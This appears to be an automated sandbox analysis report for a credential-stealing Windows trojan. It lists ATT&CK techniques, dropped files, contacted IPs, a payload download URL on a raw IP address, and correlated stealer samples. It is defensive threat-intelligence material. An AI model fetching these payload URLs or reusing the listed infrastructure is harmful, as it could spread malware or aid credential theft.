Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Process Injection	1 Timestomp	NTDS	25 System Information Discovery	Distributed Component Object Model	1 Email Collection	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
HZ1BUCfTne.exe	3%	ReversingLabs	Win32.Dropper.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	29%	ReversingLabs	Win64.Trojan.Cerbu

Source	Detection	Scanner	Label
http://150.241.95.163/brozer.exe	0%	Avira URL Cloud	safe
http://150.241.95.163	0%	Avira URL Cloud	safe
http://150.241.95.163/brozer.exeP	0%	Avira URL Cloud	safe
http://150.241.95.163/brozer.exeIError	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high
api.ipify.org	172.67.74.152	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
http://150.241.95.163/brozer.exe	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	sUKFphHSzX.exe, 00000009.00000003.1686357918.0000020931A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1687418877.0000020931A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1686453237.0000020931A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1684496708.0000020931A55000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1685603634.0000020931A52000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1687506898.0000020931A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1685529124.0000020931A50000.00000004.00000020.00020000.00000000.sdmp	false		high
http://150.241.95.163/brozer.exeP	HZ1BUCfTne.exe, 00000000.00000002.2392236786.0000000007021000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1536380808.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	sUKFphHSzX.exe, 00000009.00000003.1686357918.0000020931A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1687418877.0000020931A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1686453237.0000020931A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1684496708.0000020931A55000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1685603634.0000020931A52000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1687506898.0000020931A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1685529124.0000020931A50000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.1533581435.0000000004E37000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.1533581435.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.1533581435.0000000004E37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1538262354.000000000733D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org/w	sUKFphHSzX.exe, 00000009.00000002.1754077299.0000020933380000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr	sUKFphHSzX.exe, 00000009.00000003.1695962209.0000020931A40000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000003.00000002.1536380808.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000003.00000002.1536380808.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	sUKFphHSzX.exe, 00000009.00000003.1686357918.0000020931A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1687418877.0000020931A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1686453237.0000020931A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1684496708.0000020931A55000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1685603634.0000020931A52000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1687506898.0000020931A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1685529124.0000020931A50000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64	sUKFphHSzX.exe, 00000009.00000003.1695962209.0000020931A40000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1696230866.0000020931A3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJp	sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934758000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934758000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.1533581435.0000000004E37000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_camp22781	sUKFphHSzX.exe, 00000009.00000003.1751118200.00000209319E2000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000002.1753788629.00000209319E3000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1752860853.00000209319E3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://150.241.95.163/brozer.exeIError	HZ1BUCfTne.exe	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg	sUKFphHSzX.exe, 00000009.00000003.1695962209.0000020931A40000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700	sUKFphHSzX.exe, 00000009.00000003.1695962209.0000020931A40000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.marriott.com/default.mi?utm_sou	sUKFphHSzX.exe, 00000009.00000003.1696230866.0000020931A3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.1533581435.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	sUKFphHSzX.exe, 00000009.00000003.1695962209.0000020931A40000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1696230866.0000020931A3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org/W	sUKFphHSzX.exe, 00000009.00000002.1754077299.0000020933380000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi	sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1696230866.0000020931A3F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://150.241.95.163	HZ1BUCfTne.exe, 00000000.00000002.2392236786.000000000708C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.1533581435.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000003.00000002.1536380808.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1536380808.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	sUKFphHSzX.exe, 00000009.00000003.1695832026.0000020931A83000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1694818898.0000020933700000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1692460580.0000020934ED2000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.00000209346D1000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.000002093385E000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934748000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934750000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.0000020933856000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.00000209346C9000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1694818898.0000020933708000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta	sUKFphHSzX.exe, 00000009.00000003.1695962209.0000020931A40000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1696230866.0000020931A3F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ns.microsoft.t/Regi	sUKFphHSzX.exe, 00000009.00000003.1753160348.0000020933A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1753067336.0000020933A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1681844399.0000020933A41000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1753038445.0000020933A50000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	HZ1BUCfTne.exe, 00000000.00000002.2392236786.000000000708C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1533581435.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
150.241.95.163	unknown	Spain	207714	TECNALIAES	false
45.130.145.152	unknown	Russian Federation	49392	ASBAXETNRU	true
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1556354
Start date and time:	2024-11-15 10:27:54 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HZ1BUCfTne.exe renamed because original name is a hash value
Original Sample Name:	306c35f0a8b13eb8d3ff43f0fe031c9b2d008fddebe501e47e080111ebbb9712.exe
Detection:	MAL
Classification:	mal87.troj.spyw.evad.winEXE@7/7@1/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 173 Number of non-executed functions: 97
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: HZ1BUCfTne.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
150.241.95.163	9RM52QaURq.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.95.163/brozer.exe
45.130.145.152	9RM52QaURq.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	bv2DbIiZeK.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	brozer.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	YU7jHNMJjG.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	6Ev0Nd7z2t.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	6HWYiong4s.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	btoRtc7o3v.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	kBZhM3H0Qm.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	y2m8g4DArI.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
172.67.74.152	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	api.ipify.org/
	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	y8tCHz7CwC.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	YU7jHNMJjG.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	13.107.246.45
	seRpOAk8gH.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	13.107.246.45
	1n72lp2XjT.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	13.107.246.45
	https://www.google.dk/url?sa=https://abc123xyz456def789ghj101klm112nop345qrs678tuv901wxyz234abc567d&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiX6tO39MiJAxUSnP0HHcggDNwQFnoECBoQAQ&url=amp%2F%62%68%61%72%61%74%68%73%65%72%76%69%63%65%73%69%6E%64%69%61%2E%63%6F%6D%2F%75%6E%73%75%62%73%63%72%69%62%65%2Fab86aa851e981834b77805f77a6cca34%2Fcm9yeWdvd2VyQHF1YW50ZXhhLmNvbQ==&token=fgj784jkh23&referrerID=xyz456789&sessionKey=abc123456789&trackingID=klmn987654&clickID=7890abcd1234&userID=xyz901234&pageID=web23456789	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
	https://www.cognitoforms.com/f/QJDkMg1ACkylvn0c20THNA/1	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	13.107.246.45
	BankInformation.vbe	Get hash	malicious	AgentTesla	Browse	13.107.246.45
	23051211981390217056.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	218574937714124903.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	a3psA7WqQ5.js	Get hash	malicious	Unknown	Browse	13.107.246.45
api.ipify.org	9RM52QaURq.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	bv2DbIiZeK.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	brozer.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	YU7jHNMJjG.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	6Ev0Nd7z2t.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	6HWYiong4s.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	btoRtc7o3v.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	kBZhM3H0Qm.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	y2m8g4DArI.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TECNALIAES	9RM52QaURq.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.95.163
	eMfPZvOkbJ.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.92.160
	G13VTHRtIa.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.92.160
	u06cfykCat.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.92.160
	4p8aK00tUr.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.92.160
	aC5NsSYmN0.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	150.241.92.160
	.main.elf	Get hash	malicious	Xmrig	Browse	150.241.101.236
	invoice_template.pdf.lnk	Get hash	malicious	SmokeLoader	Browse	150.241.91.218
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Quasar, Stealc	Browse	150.241.90.56
ASBAXETNRU	9RM52QaURq.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	bv2DbIiZeK.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	brozer.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	YU7jHNMJjG.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	6Ev0Nd7z2t.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	6HWYiong4s.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	btoRtc7o3v.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	kBZhM3H0Qm.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
	y2m8g4DArI.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	45.130.145.152
CLOUDFLARENETUS	9RM52QaURq.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	bv2DbIiZeK.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	brozer.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	NewVoicemail - +1 392 504 7XXX00-33Rebecca.silvaTranscript.html	Get hash	malicious	Unknown	Browse	104.16.123.96
	YU7jHNMJjG.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	6Ev0Nd7z2t.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	6HWYiong4s.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	btoRtc7o3v.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	kBZhM3H0Qm.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	9RM52QaURq.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	bv2DbIiZeK.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	brozer.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	YU7jHNMJjG.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	6Ev0Nd7z2t.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	6HWYiong4s.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	btoRtc7o3v.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	kBZhM3H0Qm.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	y2m8g4DArI.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	9RM52QaURq.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HZ1BUCfTne.exe.log

Download File

Process:	C:\Users\user\Desktop\HZ1BUCfTne.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	5.357600602687667
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4q4E4Tye:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HL
MD5:	5E81AA26543B9563AD2F3DD158C2D251
SHA1:	8CDDEF245BA7B062E14CD647C625A5E56540D4D7
SHA-256:	74F0D7AE39AD589C466A7E10EDF16AC218774048E97A92F5C8862715EEEF0685
SHA-512:	F802BA6E36BDE95C51B5559B6104B8E82E6F8157CF762C7F4BBA0A2E7364809157D08670D6E841A59FD32111B876C7C460B2E05ACED78720F044759D6DBF5BD4
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.3747692276809005
Encrypted:	false
SSDEEP:	48:gWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YUyus:gLHyIFKL3IZ2KRH9Oug8s
MD5:	D0706FE89DC58337C683D621F2936D54
SHA1:	363B93C268EB3044CDE6FF35FD4712C6A53F84D6
SHA-256:	46EB701606E889F386A3B44588297DE9CEECCC748D82035E763E66016C353095
SHA-512:	094C320E213FA49E983A9393B3A1B6A888301333BDC0ECBBD9AFC126E17D90828973CA3F05C46F831EACE490E9A2080473D52428FCB95F7C793E9CED90EE7748
Malicious:	false
Reputation:	low
